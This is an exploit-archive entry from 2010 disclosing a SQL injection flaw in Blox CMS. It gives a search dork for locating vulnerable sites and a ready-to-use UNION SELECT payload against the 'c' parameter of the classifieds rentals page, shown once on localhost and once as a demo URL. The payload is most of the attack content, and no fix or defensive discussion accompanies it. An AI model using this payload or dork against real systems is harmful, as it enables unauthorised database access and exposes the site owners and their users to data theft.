[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Blox CMS SQL Injection Vulnerability
# Published : 2010-05-24
# Author : CoBRa_21
# Previous Title : Microsoft Outlook Web Access (OWA) version 8.2.254.0 information disclosure vulnerability
# Next Title : ProWeb Design SQL Injection Vulnerability
-------------------------------------------------------------------------------------------
Blox CMS SQL Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Script Home: http://bloxcms.com/
Dork: Powered by Blox CMS from TownNews.com
-------------------------------------------------------------------------------------------
Sql Injection:
http://localhost/[path]/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15
Demo :
http://www.site.com/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15
-------------------------------------------------------------------------------------------